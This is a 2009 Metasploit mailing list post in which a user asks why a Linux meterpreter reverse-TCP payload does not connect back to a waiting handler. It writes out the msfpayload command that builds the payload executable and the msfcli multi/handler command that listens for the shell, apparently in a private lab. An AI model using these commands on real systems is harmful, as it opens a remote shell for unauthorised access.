Metasploit mailing list archives

problem with metsvc_reverse_tcp


From: jeffs at speakeasy.net (Jeffs)
Date: Sat, 05 Sep 2009 10:57:33 -0400

Correct me if I'm wrong but I always thought the

linux/x86/metsvc_reverse_tcp payload was essentially the same as the 
windows/meterpreter/reverse_tcp except it produces an executable 
suitable for linux.

when I use the following command on a linux box:

./msfpayload linux/x86/metsvc_reverse_tcp lhost=192.168.1.102 lport=8181 
X > linuxreversemet

and chmod it to +x then execute it with ./linuxreversemet and listen 
with tcpdump port 8181, nothing is going out the door to connect to a 
waiting meterpreter service on another linux box which sits patiently 
after executing:

./msfcli exploit/multi/handler payload=linux/x86/metsvc_reverse_tcp 
lhost=192.168.1.102 lport=8181 E

What am I missing?



Current thread: